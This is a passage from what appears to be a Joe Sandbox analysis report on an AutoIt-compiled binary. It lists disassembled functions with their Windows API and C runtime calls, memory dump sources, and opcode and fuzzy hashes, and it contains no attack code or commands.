                                                                                                        • API String ID: 2438371351-0
                                                                                                        • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                        • Instruction ID: 05699d37a306a8334bca2d5cded8b66a6b3e0302f996a52e5939a3ace17055b3
                                                                                                        • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                        • Instruction Fuzzy Hash: 4A620C30A14218DBEB24CFA4C840BDEB376FF98304F1095A9D10DEB294E7799E85DB59
                                                                                                        Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: Error:
                                                                                                        • API String ID: 4104443479-232661952
                                                                                                        • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                        • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                        Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                        • String ID: X$pWH
                                                                                                        • API String ID: 85490731-941433119
                                                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                        Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                        • String ID: @EXITCODE
                                                                                                        • API String ID: 2734553683-3436989551
                                                                                                        • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                        • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                        Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1794320848-0
                                                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                        Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconNotifyShell_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1144537725-0
                                                                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                        Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 680241177-0
                                                                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                        Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                        • _free.LIBCMT ref: 004295A0
                                                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                        • API String ID: 3938964917-2806939583
                                                                                                        • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                        • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                        Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcat
                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                        • API String ID: 1765576173-2684727018
                                                                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                        Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClearVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 1473721057-0
                                                                                                        • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                        • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                        Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__wsplitpath_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4163294574-0
                                                                                                        • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                        • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                        Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3199840319-0
                                                                                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                        Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                        Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800547568-0
                                                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
